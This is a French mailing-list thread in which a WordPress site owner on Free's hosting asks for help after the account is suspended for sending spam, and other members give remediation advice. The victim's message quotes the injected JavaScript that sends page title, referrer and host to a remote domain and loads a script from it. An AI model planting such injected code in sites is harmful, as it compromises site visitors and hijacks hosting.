[Toulibre] site free suspendu

[julien ortet]

Le 30/01/2016 11:08, Philippe Masson via Toulouse-ll a écrit :
> Le 30/01/2016 10:19, Julien Marin via Toulouse-ll a écrit :
>> Salut,
>>
>> Pour se rencontrer physiquement, ça aurait été un plaisir de te filer un
>> coup de main, main ca risque d'être compliqué, vu que je suis parti
>> jusqu'à Bamako (Mali). Si tu as besoin tu peut tenter de m’appeler au 05
>> 82 880 880 (c'est un numéro français tarif normal redirigé via VOIP sur
>> mon ordinateur si je suis connecté au moment ou tu appelles. Si je suis
>> connecté  tu pourras me joindre dessus.))
>>
>> Il faut faire deux choses:
>>
>> *1/ réactiver ton accès *
>> Normalement, tu doit pouvoir faire ça depuis les pages de gestion de ton
>> compte Free.
>> *ATTENTION* Le problème n'est pas résolu et l'envoi de spam ouvert par
>> le hacker va reprendre si tu ne refermes pas la porte qu'il a ouverte...
>> Et si ça reprend free va te suspendre à nouveau.
>> Une fois que tu aura récupéré ton accès FTP, je te conseille d'ajouter
>> les deux lignes suivantes au début du fichier .htaccess situé à la base
>> de ton hébergement:
>>
>> DENY FROM ALL
>> ALLOW FROM 1.2.3.4
>>
>> (remplace 1.2.3.4) par ton adresse IP. Cela restreindra l’accès HTTP à
>> ton site à ta seule adresse IP. Ca te permettra de le réparer
>> tranquillement, sans risquer que le hacker ne renvoie du spam et que ton
>> site soit à nouveau bloqué par Free.
>>
>> *2/ Nettoyer ton site*
>>
>> Mettre ton site à jour est une bonne chose: ça supprimera la faille de
>> sécurité via laquelle le pirate est entré et à installé ses fichiers,
>> mais ça ne sufira pas: il a déjà installé son système d'envoi de spam
>> sur ton site.
>>
>> Cherche sur google "réparer wordpress hacké", tu trouvera plein de tutos
>> à ce sujet. Ca te permetra de remetre ton site dans l'état où il était
>> avant que tu te fasses hacker (c'est à dire, virer ce que le hacker à
>> rajouté sur ton site)
>>
>> Une fois que tu auras fait le nécessaire (et pas avant), tu peut enlever
>> les deux lignes de ton .htaccess que tu avait ajouté. (surtout le DENY
>> FROM ALL) afin que tu site soit de nouveau accessible à tout le monde
>> (c'est le but, hein...)
>>
>> Julien
>>
>>
>
> Bonjour,
>
>
> Les conseils de Julien sont excellents.
> Cela étant la mise à niveau de ton CMS mériterait de s'effectuer en 
> préalable sur ton ordinateur, localement, de préférence en n'utilisant 
> aucun des fichiers sources originaux de Wordpress ou à défaut en 
> plusieurs temps :
> - reconstruction du site en local avec les sources et la base de données
> - mise à jour automatisée interne à wordpress
> - export local (phpmyadmin) de la base de données "à jour"
> - deuxième reconstruction locale avec seulement les sources de la 
> version la plus récente (ceci permet d'être certain qu'aucun des 
> fichiers originaux ne subsistent) et de la base de données actualisée 
> et donc compatible.
> - adaptation des fichiers de configuration et de la base de données 
> aux paramètres correspondant à ton espace d'hébergement chez free ;
> - upload de la nouvelle base et des sources propres chez free
>
> Je ne suis pas spécialiste de ce cms mais il doit sûrement exister des 
> plugins-extensions de wordpress etendant les fonctionnalités de 
> sécurisation contre le spam. Cela peut le cas échéant te protéger 
> mieux que l'installation de base.
Salut,

ouais y a wordfence security, après peut être te faudrait il envisager 
une autre solution d’hébergement, te permettant d'avoir un wordpress et 
un php à jours.
Tu as pensé à l'autohebergement ?

>
> En espérant que tout ça te soit utile.
> Bon week-end.
>
> Philippe
>
>
>>
>>
>> Malinux Télé
>> Donner l’accès aux logiciels libres éducatifs aux enfants du Mali et
>> d’ailleurs
>> http://malinuxtele.tuxfamily.org
>> Le 29/01/2016 15:15, Camille à barbe a écrit :
>>> Salut Julien,
>>> Merci de m'avoir répondu. Je ne faisais pas d'envois de mails, et j'ai
>>> effectivement constaté que des fichiers apparaissaient sur mon site.
>>> J'ai l'habitude d'utiliser filezilla pour uploader des fichiers et
>>> contourner quelques limites imposées par wordpress. Je constate que je
>>> ne peux plus me connecter en ftp à mon site. Serait-il possible qu'on
>>> prenne rendez-vous pour essayer de régler ça ensemble : je me sens
>>> perdu et j'ai un mode de vie particulier, un peu précaire en ce
>>> moment, qui fait que je voudrais régler ça rapidement. Tu accepterais
>>> qu'on se rencontre pour voir ça ensemble ?
>>>
>>> Le 29/01/2016 15:27, Julien Marin a écrit :
>>>> Salut camille,
>>>>
>>>> Un envoi de spam peut signifier:
>>>>
>>>>   * Soit que tu as envoyé beaucoup de mail (type newsletter) depuis
>>>>     le site et que des gens soient allés se plaindre à free (beaucoup
>>>>     ne font la différente entre un mail militant et une pub pour du
>>>>     viagra, du moment qu'il n'a pas été désiré, c'est triste mais
>>>>     c'est comme ça)
>>>>   * Soit que ton wordpress a du être hacké par des spammeurs qui s'en
>>>>     sont servi pour envoyer du spam.
>>>>
>>>> Si c'est cette deuxième hypothèse, les pirates ont du profiter d'une
>>>> faille wordpress (ou d'un code d'accès à l'interface d'administration
>>>> facile à trouver) pour prendre la main sur ton site, y installer un
>>>> module de mass-mailing, et balancer à tout va des pub diverses avant
>>>> que free ne te bloque...
>>>>
>>>> Dans ce cas, il ne s'agit pas d'un hack à visée politique visant le
>>>> site en tant que tel, mais d'une attaque automatisée cherchant dans
>>>> la masse de site, lesquels présenteraient une vulnérabilité connue,
>>>> afin d'en profiter pour émettre du spam.
>>>>
>>>> Un moyen de le vérifier si tu as été hackée, est de te promener dans
>>>> le FTP de ton site, si tu voies des fichier en .php (les exécutables
>>>> de ton site web) modifiés récemment, c'est que qqn a du trouver un
>>>> moyen d'injecter ses propres scripts (a fins d'envoi de spam) sur ton
>>>> site.
>>>>
>>>> Si c'est le cas, il ne faudra d'abord "nettoyer" ton installation de
>>>> wordpress avant remise en ligne
>>>>
>>>> JUlien
>>>>
>>>>
>>>> Malinux Télé
>>>> Donner l’accès aux logiciels libres éducatifs aux enfants du Mali et
>>>> d’ailleurs
>>>> http://malinuxtele.tuxfamily.org
>>>>
>>>>
>>>> Le 29/01/2016 13:34, Camille à barbe via Toulouse-ll a écrit :
>>>>> Bonjour,
>>>>> Je gère (comme je peux) un site internet hébergé par free, 
>>>>> propulsé par
>>>>> wordpress 3.1.4.
>>>>>
>>>>>
>>>>> Pourquoi je voudrais le remettre en place ?
>>>>> Je l'ai mis en place pour faire suite à une inculpation au sujet
>>>>> d'une action
>>>>> menée à Notre-Dame-des-Landes qui nous a valu deux procès avant
>>>>> d'être relaxés.
>>>>> Pour en savoir davantage, il reste un embryon de site que j'avais
>>>>> mis en place
>>>>> pour préparer le premier procès :http://kamyas1naz.free.fr/photos.htm
>>>>> ainsi que la page facebook associée
>>>>> :https://www.facebook.com/kamyapoil/
>>>>> Je poursuis cette démarche et ce site m'est utile pour présenter les
>>>>> actions
>>>>> déjà menées et en préparer d'autres.
>>>>>
>>>>>
>>>>> Pourquoi free a suspendu le compte ?
>>>>> J'ai reçu ce message de la part de free le 27 janvier :
>>>>>
>>>>>
>>>>> "Bonjour,
>>>>>
>>>>> Ce courrier électronique vous est adressé pour vous indiquer que
>>>>> votre compte
>>>>> Pages Perso kamyapoil a été suspendu pour la raison suivante :
>>>>>
>>>>> Votre compte envoie du Spam (mail non solicite) via la fonction php
>>>>> mail()
>>>>>
>>>>> Pour lever la suspension, consultez les newsgroups
>>>>> proxad.free.services.pagesperso pour effectuer les pré-requis
>>>>> nécessaires à la
>>>>> ré-activation de votre compte et postez votre demande dans le fil
>>>>> qui vous sera
>>>>> indiqué. ( la page d'assistance sur le site de Free vous donnera les
>>>>> informations nécessaires pour accéder à ce forum -
>>>>> http://www.free.fr/assistance/541.html ). Aucun support ne sera fait
>>>>> par mail.
>>>>>
>>>>> ATTENTION : en l'absence de réaction de votre part dans les deux
>>>>> mois, votre
>>>>> compte Pages Perso sera DETRUIT.
>>>>>
>>>>>
>>>>> Cordialement,
>>>>> Le service Pages Perso."
>>>>>
>>>>> J'avais eu un signe avant coureur. A partir du mois d'octobre, des
>>>>> lignes de codes ont été insérées à mon insu :
>>>>>
>>>>> <script>var a=''; setTimeout(10); var default_keyword =
>>>>> encodeURIComponent(document.title); var se_referrer =
>>>>> encodeURIComponent(document.referrer); var host =
>>>>> encodeURIComponent(window.location.host); var base =
>>>>> "http://megatest.vn/js/jquery.min.php"; var n_url = base +
>>>>> "?default_keyword=" + default_keyword + "&se_referrer=" + 
>>>>> se_referrer +
>>>>> "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" +
>>>>> encodeURIComponent(n_url); if (default_keyword !== null &&
>>>>> default_keyword !== '' && se_referrer !== null && se_referrer !==
>>>>> ''){document.write('<script type="text/javascript" src="' + f_url +
>>>>> '">'
>>>>> + '<' + '/script>');}</script>
>>>>>
>>>>> Elles se trouvaient dans l'en-tête des feuilles de style et avaient
>>>>> pour effet de bloquer une dizaine de secondes chaque page du site
>>>>> qu'on essayait de charger. Je n'y connais vraiment pas grand chose,
>>>>> mais un sympathisant m'a prévenu du problème et je les ai effacées.
>>>>> Mais elles revenaient à chaque fois, une à deux fois par semaine.
>>>>> J'ai pris l'habitude de les retirer. J'ai modifié le nom
>>>>> d'administrateur et le mot de passe, mais ça n'a pas réglé le
>>>>> problème. J'ai continué à effacer ces lignes de code, une à deux
>>>>> fois par semaine.
>>>>> Je voulais changer les autres mots de passe (base de données, et je
>>>>> ne sais quoi d'autre), et télécharger une version plus récente de
>>>>> wordpress puisqu'on n'est plus limité à la version 3.1.4 depuis
>>>>> quelques temps, mais je ne l'ai pas fait par peur de tout planter :
>>>>> j'espérais trouver quelqu'un pour m'y aider. Free ne m'a pas laissé
>>>>> davantage de temps pour résoudre le problème et le site est
>>>>> maintenant suspendu. Je ne comprends pas comment faire pour accéder
>>>>> à la demande de free. J'ai rencontré quelqu'un de tetraneutral qui
>>>>> m'a suggéré de me tourner vers vous. Pouvez vous m'aider ?
>>>>>
>>>>> Merci.
>>>>>
>>>>> _______________________________________________
>>>>> Toulouse-ll mailing list
>>>>> Toulouse-ll at toulibre.org
>>>>> http://toulibre.org/cgi-bin/mailman/listinfo/toulouse-ll
>>>>
>>>
>>
>>
>>
>> _______________________________________________
>> Toulouse-ll mailing list
>> Toulouse-ll at toulibre.org
>> http://toulibre.org/cgi-bin/mailman/listinfo/toulouse-ll
>>
>
>